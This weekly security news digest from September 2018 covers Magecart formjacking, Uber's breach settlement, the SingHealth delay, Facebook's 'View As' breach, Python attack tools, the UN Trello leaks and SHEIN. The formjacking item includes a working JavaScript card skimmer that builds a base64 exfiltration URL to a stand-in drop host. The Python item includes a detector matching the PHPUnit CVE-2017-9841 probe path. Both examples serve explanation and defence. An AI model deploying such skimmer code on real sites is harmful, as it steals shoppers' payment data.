Week of September 28, 2018


Symantec Sees Major Rise In “Formjacking” Attacks*:

     The number of formjacking attacks has risen "dramatically" in the past month or two.

     Following large, eyebrow-raising attacks on Ticketmaster, British Airways, Feedify and Newegg, all attributed to a group called Magecart, Symantec analysed the threat landscape and found that all of these attacks (and many more) used what is known as the formjacking technique.

     Formjacking is a technique in which a malicious actor or group injects JavaScript code into a website's pages so that it runs alongside the site's forms.

     Most often, those are check-out or payment forms on e-commerce sites.

     Then, when an unsuspecting victim submits their data (for example, credit card details and email address) to purchase something, the injected script sends a copy of that information to the attacker's servers.

     Symantec says it has blocked 248,000 formjacking attempts since August 13 this year; more than a third of those (36 per cent) occurred between September 13 and September 20.

     That is a 117 per cent increase in blocked formjacking instances compared with the equivalent week in August.
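     The following is an added example, not code from the article or from Symantec, showing the two halves of the technique described above: a minimal skimmer that copies the fields of a checkout form before the real submission proceeds, and a defender-side check of whether a Content-Security-Policy connect-src directive would let the skimmer's exfiltration request leave the page. The form, field values, policy and hostnames (shop.example, api.payments.example, cdn-metrics.example.net) are constructed for the example; the form is a plain object so it runs under Node without a browser DOM.

```javascript
// Added example, not code from the article or from Symantec: how a formjacking
// skimmer harvests a checkout form, and how a Content-Security-Policy (CSP)
// connect-src directive decides whether its exfiltration request may be sent.
// The form, field values, policy and hostnames are all constructed.

// --- Attacker side ---------------------------------------------------------
// A real skimmer hooks the form's submit event in the browser; here the form
// is a plain object so the logic runs under Node without a DOM.
function skimForm(form) {
  // Copy every filled-in name/value pair before the real submit proceeds,
  // so the customer still sees a normal, successful purchase.
  const stolen = {};
  for (const field of form.fields) {
    if (field.name && field.value !== '') stolen[field.name] = field.value;
  }
  return stolen;
}

function exfilUrl(stolen, dropHost) {
  // Skimmers typically base64-encode the harvested fields and ship them in an
  // image or beacon request to a host the attacker controls.
  const data = Buffer.from(JSON.stringify(stolen)).toString('base64');
  return `https://${dropHost}/collect?d=${encodeURIComponent(data)}`;
}

// --- Defender side ---------------------------------------------------------
// Parse a CSP header value into a Map of directive name -> source list.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return policy;
}

// Does `policy` let a page served from `pageOrigin` open a connection to `url`?
// Uses connect-src and falls back to default-src, as the CSP spec does.
// Simplified: host and scheme matching only, no port or path matching.
function cspAllowsConnect(policy, pageOrigin, url) {
  const sources = policy.get('connect-src') || policy.get('default-src');
  if (!sources) return true; // no applicable directive: nothing is restricted
  const target = new URL(url);
  const page = new URL(pageOrigin);
  for (const src of sources) {
    if (src === "'none'") return false;
    if (src === '*') return true;
    if (src === "'self'") {
      if (target.origin === page.origin) return true;
      continue;
    }
    if (src.startsWith('*.')) { // wildcard host such as *.example.com
      if (target.hostname.endsWith(src.slice(1))) return true;
      continue;
    }
    const hasScheme = src.includes('://');
    const s = new URL(hasScheme ? src : `https://${src}`);
    if (s.hostname === target.hostname && (!hasScheme || s.protocol === target.protocol)) {
      return true;
    }
  }
  return false;
}

// Run the skimmer against a constructed checkout form, then check its beacon
// against a policy that pins connections to the shop and its payment processor.
function demo() {
  const checkout = {
    fields: [
      { name: 'email', value: 'alice@example.com' },
      { name: 'cardNumber', value: '4111111111111111' },
      { name: 'cvv', value: '123' },
      { name: 'promo', value: '' },
    ],
  };
  const stolen = skimForm(checkout);
  const beacon = exfilUrl(stolen, 'cdn-metrics.example.net'); // constructed drop host
  const policy = parseCsp(
    "default-src 'self'; script-src 'self' https://js.payments.example; " +
    "connect-src 'self' https://api.payments.example"
  );
  const origin = 'https://shop.example';
  return {
    stolen,
    beacon,
    beaconBlocked: !cspAllowsConnect(policy, origin, beacon),
    processorAllowed: cspAllowsConnect(policy, origin, 'https://api.payments.example/charge'),
  };
}
```

     In the demo the beacon to the constructed drop host is blocked while the call to the payment processor is allowed. A connect-src allow-list only closes the exfiltration channel; the skimmer still has to be injected or loaded in the first place, so this sits behind a tight script-src and Subresource Integrity on any third-party script the checkout page loads.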

*Source: IT Pro Portal, September 26, 2018


Uber To Pay $148 Million In Settlement Over 2016 Data Breach*:

     Uber Technologies will pay $148 million to settle claims related to a large-scale data breach that exposed the personal information of more than 25 million of its U.S. users.

     The settlement, spanning all 50 states and the District of Columbia, is the biggest data-breach payout in history, and marks the most sweeping rebuke by regulators against the San Francisco-based company, which earned a reputation for skirting rules in its push to dominate the ride-hailing market. 

     The states' agreement stemmed from data compromised in 2016 by hackers, who obtained 607,000 U.S. driver's license numbers as well as tens of millions of consumer email addresses and phone numbers; Uber failed to disclose the breach for more than a year after discovering it.

     The penalty comes at a pivotal time for Uber Chief Executive Officer Dara Khosrowshahi, who is laying the groundwork for a 2019 initial public offering while working to distance the brand from the controversial growth-at-all-costs approach established under his predecessor, co-founder Travis Kalanick.

     Bloomberg News reported last November that Kalanick learned of the 2016 breach just a month after hackers stole the personal data on 57 million of Uber’s customers around the globe, including 25.6 million riders and drivers in the U.S.

     But the company concealed the breach from authorities and instead paid the hackers $100,000 to delete the stolen data and keep the incident quiet.

     After the episode came to light, Uber ousted its chief security officer and disclosed the breach to the Federal Trade Commission, which had already reprimanded the company for a similar data breach from 2014.

     The nine-figure settlement will be distributed to the states, rather than directly to those affected in the breach.

     As part of the agreement, Uber also promised to improve its security policies and hire an outside party to monitor its data-privacy efforts and regularly report on necessary improvements.

*Source: Bloomberg, September 26, 2018


Six-Day Delay in IHiS Staff Learning Data Was Stolen*:

     On July 4, staff of SingHealth's IT vendor, IHiS, discovered and halted a cyber-attack on the public healthcare group.

     But it took another six days for them to confirm that personal data and prescription records were stolen.

     The reason for the delay was a mistaken statement by an IHiS employee that no data had been stolen.

     It was not until his superior re-ran one of the hackers' queries at a July 10 meeting that IHiS found the attackers had stolen the personal data of 1.5 million people and the prescription records of 160,000 people, including Prime Minister Lee Hsien Loong and several ministers.

     These details emerged during the testimony of Mr Henry Arianto, IHiS deputy director of product management and delivery in the clinical care department, before a four-member Committee of Inquiry (COI) yesterday.

     Mr Arianto said one of his employees told him on July 9 that the query made by the hackers to SingHealth's database on July 4 - which IHiS discovered and stopped - did not return any results.

     Mr Arianto shared this information at a July 9 meeting with several senior IHiS staff.

     During another meeting on July 10, Mr Arianto decided to "double-check" by running one of these queries. That was when he realised his staff member had been wrong.

     Later that day, the Cyber Security Agency of Singapore was informed of the attack, as were the Health Ministry and SingHealth. Singaporeans were told on July 20.

*Source: The Straits Times, September 27, 2018


Facebook Security Breach: Up to 50 Million Accounts Hacked*:

     Facebook says almost 50 million of its users were left exposed by a security flaw.

     The company said attackers were able to exploit a vulnerability in a feature known as “View As” to gain control of people's accounts.

     The breach was discovered on Tuesday, Facebook said, and it has informed police.

     Users who had potentially been affected were prompted to log in again on Friday.

     The flaw has been fixed, wrote the firm's vice-president of product management, Guy Rosen, adding that the access tokens of all affected accounts had been reset, as well as those of another 40 million accounts "as a precautionary step".

     The company has confirmed to reporters that the flaw would also have let the attackers log in to third-party services that accept Facebook logins, of which there are many.

     The company said the users prompted to log in again did not have to change their passwords.

     The company has confirmed that Facebook founder Mark Zuckerberg and its chief operating officer Sheryl Sandberg were among the 50 million accounts affected.

     The breach comes at a time when the firm is struggling to convince lawmakers in the US and beyond that it is capable of protecting user data.

     Facebook founder Mark Zuckerberg said on a conference call on Friday that the firm took security seriously, in the face of what he said were constant attacks by bad actors.

     But Jeff Pollard, vice-president and principal analyst at Forrester, said the fact that Facebook held so much data meant it should have been prepared for such attacks.

     When asked by the BBC, Facebook was unable to say whether the investigation would look into why the bugs were missed, or whether anyone at the company would be held accountable for the breach.

*Source: BBC, September 29, 2018


Report Finds Python is a Hit With Hackers*:

     After breaking into the top three most popular programming languages for the first time this month, behind C and Java, Python has also won the hearts of hackers and web nasties, according to attack statistics published this week by web security firm Imperva.

     The company says more than a third of daily attacks against the sites it protects come from a tool, malicious or legitimate, written in Python.

     Imperva says that around 77 percent of all the sites the company protects have been attacked by at least one Python-based tool.

     Furthermore, when the company looked at the list of tools hackers used for their attacks, more than a quarter were written in Python, making it by far the attackers' favourite language.

     Advantages to Python include an easy to pick up syntax, a breadth of online tutorials, and an extensive collection of libraries and other ready-made tools available in places like PyPI and GitHub.

     In fact, many of the Python tools attackers use were created for use inside legitimate apps, or by security researchers for testing their own systems against various vulnerabilities.

     But once these testing tools are published on GitHub they are available to anyone, and hackers deploy them in ways other than those for which they were created.

     Based on Imperva's data, the most abused legitimate Python tools are the "requests" and "urllib" libraries, two of the cornerstones of almost any Python web app.

     As for what hackers do with these things, Imperva's crew says they're attempting to exploit vulnerabilities like CVE-2017-9841 (PHPUnit), CVE-2015-8562 (Joomla), or CVE-2018-1000207 (ModX PHP CMS).

     The moral of this report is that if you have a web app, web server or website exposed online, it is quite likely that some script kiddie is using a Python tool downloaded from GitHub to try to break into your server. Which, in hindsight, is no surprise, since Python is just as versatile as Java but much easier to learn, for good and bad guys alike.
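     The following is an added example, not code from the article or from Imperva, of what a defender can do with the two findings above: it parses combined-format web server access log lines, flags requests whose User-Agent carries the default prefixes that the "requests" and "urllib" libraries send, tallies them per source address, and marks hits on the path commonly probed for the PHPUnit vulnerability (CVE-2017-9841). The log lines are constructed; the PHPUnit path is public knowledge but is not quoted in the article.

```javascript
// Added example, not code from the article or from Imperva: flag requests to a
// web server that come from the Python "requests" and "urllib" libraries the
// report names, by parsing Apache/nginx combined-format access log lines.
// The log lines below are constructed.

// Combined log format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
const COMBINED_LOG = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/;

// Default User-Agent prefixes the two libraries send unless the caller
// overrides them. Attackers can change them, so this is a low-effort signal,
// not proof of an attack.
const PYTHON_UA = [/^python-requests\//i, /^Python-urllib\//i];

// Path commonly probed for CVE-2017-9841 (PHPUnit eval-stdin.php); public
// knowledge, not quoted in the article.
const PHPUNIT_PROBE = '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php';

function parseLine(line) {
  const m = COMBINED_LOG.exec(line);
  if (!m) return null; // not a combined-format line
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]), ua: m[6] };
}

function isPythonTool(ua) {
  return PYTHON_UA.some((re) => re.test(ua));
}

// Returns the number of requests from Python tools, a per-IP count of them,
// and the subset that targeted the PHPUnit probe path.
function analyse(lines) {
  const byIp = new Map();
  const probes = [];
  let pythonHits = 0;
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec || !isPythonTool(rec.ua)) continue;
    pythonHits += 1;
    byIp.set(rec.ip, (byIp.get(rec.ip) || 0) + 1);
    if (rec.path.endsWith(PHPUNIT_PROBE)) probes.push(rec);
  }
  return { pythonHits, byIp, probes };
}

// Constructed sample: a normal browser, a requests-based scanner probing two
// PHPUnit locations, and a urllib client fetching the home page.
const SAMPLE_LOG = [
  '203.0.113.7 - - [28/Sep/2018:10:01:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/62.0"',
  '198.51.100.23 - - [28/Sep/2018:10:01:05 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 210 "-" "python-requests/2.19.1"',
  '198.51.100.23 - - [28/Sep/2018:10:01:06 +0000] "POST /wp-content/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 210 "-" "python-requests/2.19.1"',
  '192.0.2.44 - - [28/Sep/2018:10:02:10 +0000] "GET /index.php HTTP/1.1" 200 3200 "-" "Python-urllib/3.6"',
];

const report = analyse(SAMPLE_LOG);
console.log(`${report.pythonHits} requests from Python tools, ${report.probes.length} PHPUnit probes`);
for (const [ip, n] of report.byIp) console.log(`${ip}: ${n}`);
```

     On the sample the scanner at 198.51.100.23 accounts for both PHPUnit probes, which is the kind of source worth rate-limiting or blocking at the WAF; the lone urllib fetch of the home page is not by itself suspicious. Because the User-Agent is trivially spoofed, the probe-path match is the stronger of the two signals.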

*Source: ZDNet, September 28, 2018


UN Exposes Sensitive Data on Public Trello Boards*:

     The United Nations accidentally exposed passwords and internal information to the public-facing internet by misconfiguring Trello boards and other web applications.

     Security researcher Kushagra Pathak discovered the data leak through Google searches that turned up public Trello boards belonging to the organisation.

     The information included credentials for a U.N. file server, an internal conferencing system and an internal web development platform.

     Trello, a project management web app, sets newly created boards to private by default, so any boards set to public were configured that way by the owner of the board.

     After Pathak found one public Trello board in use by the U.N., it was easy to find others by looking at the board's members and discovering what other boards they were active on.

     On other public Trello boards, he found links to the issue tracking app Jira, where there was more sensitive information, and to Google Docs and Google Drive instances with documents that contained passwords.

     Pathak reported his findings to the U.N.'s security team on Aug. 20.

     On Twitter, he criticized the U.N.'s response to his report; the organization didn't acknowledge it until Sept. 4, and no action was taken until Sept. 12, when a reporter from The Intercept reached out to the U.N. for comment.

     While Pathak waited for the U.N. to address the report, he found and reported even more public Trello boards used by the organisation; in total he found 60 Trello boards, several Google Docs and Google Drive folders, and sensitive information in the U.N.'s Jira account.

     The U.N. began taking down the exposed information on Sept. 13, and most of it appears to be gone now.

*Source: Search Security, September 28, 2018


6.42 Million Shoppers Hit by Online Fashion Shopping Giant’s Massive Data Breach*:

     Women's online fashion store SHEIN has announced that its servers were breached in a sophisticated criminal cyberattack that leaked the confidential information of around 6.42 million customers.

     The company confirmed the hackers managed to snag personal information including email addresses and the encrypted passwords of customers who visited its website between June 2018 and early August 2018.

     However, SHEIN says it has seen no evidence that credit card information was taken during the breach, since it does not store that type of data on its servers.

     SHEIN says that immediately upon becoming aware of the breach it hired a leading international forensic cybersecurity firm and an international law firm to conduct a thorough investigation.

     SHEIN also admitted in its advisory that it became aware of the breach on Aug. 22 but did not inform its customers for almost a month.

     According to SHEIN's security advisory, the attackers managed to breach its security protections and plant malware on its servers.

     The company did not specify the type of malware that was involved in the cyberattack but it wrote that the affected SHEIN servers have been scanned and the malware has been removed.

     The server backdoors and entry points used by the hackers have also been closed and removed.

     The investigators and SHEIN's IT department will continue to closely monitor their network and servers to prevent similar breaches in the future.

     SHEIN is now in the process of notifying affected customers and the proper authorities about the cyberattack.

     Customer notices are now being sent via email that provide instructions on how to reset account passwords via SHEIN's website.

     SHEIN is also offering a year's worth of identity theft monitoring services to affected customers.

*Source: Komando, September 28, 2018

